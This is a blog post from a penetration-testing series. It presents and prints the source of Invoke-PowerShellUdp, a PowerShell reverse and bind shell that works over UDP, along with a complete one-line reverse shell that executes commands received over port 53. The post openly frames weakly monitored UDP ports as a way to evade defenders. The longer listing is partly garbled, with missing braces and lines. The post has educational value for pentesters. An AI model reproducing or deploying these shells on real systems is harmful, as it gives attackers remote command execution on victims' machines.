Week of PowerShell Shells – Day 2 – UDP Shells

Welcome to the day 2 of Week of PowerShell Shells. Today we will see how UDP could be used for interactive PowerShell shells. I love UDP because many security and infrastructure teams love to ignore it. I have seen client environments where UDP ports like 53, 161 and even 389 are not properly filtered and monitored. Lets use this condition for our benefit and get some shells.
Let me introduce to you, Invoke-PowerShellUdp. It is similar to Invoke-PowerShellTcp in syntax. Here is the current source without the credits and help documentation:
function Invoke-PowerShellUdp
[CmdletBinding(DefaultParameterSetName="reverse")] Param(

[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]

[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]




#Connect back if the reverse switch is used.
if ($Reverse)
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPAddress),$Port)
$client = New-Object System.Net.Sockets.UDPClient

#Bind to the provided port if Bind switch is used.
if ($Bind)
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::ANY,$Port)
$client = New-Object System.Net.Sockets.UDPClient($Port)

[byte[]]$bytes = 0..255|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')

$receivebytes = $client.Receive([ref]$endpoint)
$returndata = ([text.encoding]::ASCII).GetString($receivebytes)
$result = (Invoke-Expression -Command $returndata 2>&1 | Out-String )

$sendback = $result + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$sendback2 = $sendback + $x

#Send results back
$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback2)

It is available in the Shells directory of Nishang repository https://github.com/samratashok/nishang/tree/master/Shells

A screenshot of Invoke-PowerShellUdp reverse shell in action:

An interactive PowerShell reverse shell over UDP using IPv6:

A bind connection:

Pcaps for all of the above could be found here on my Google drive: https://drive.google.com/open?id=0B-Hsu8q12kG3fmZoREtISjJyTjZiRGpGN29SVVJDWF9TVlBmVExFRnVlWHRsUkVXOTdmLUU&authuser=0

Invoke-PowerShellUdp has a one line version as well with many lines of code stripped down. It is a reverse only version and IPAddress and Port number needs to be hardcoded. Below is the current source of Invoke-PowerShellUdpOneLine

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse(""),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..255|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()
Powercat could also be used for getting interactive PowerShell over UDP.

That is all for today! Hope you enjoyed it.

If you enjoyed the post and want to learn more and/or want to support my research and work, join me for a two days training “PowerShell for Penetration Testers” at:
NolaCon, New Orleans (June 10-11th)https://nolacon.com/powershell-for-penetration-testers/

Shakacon, Honolulu (July 6-7th)http://shakacon.org/


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s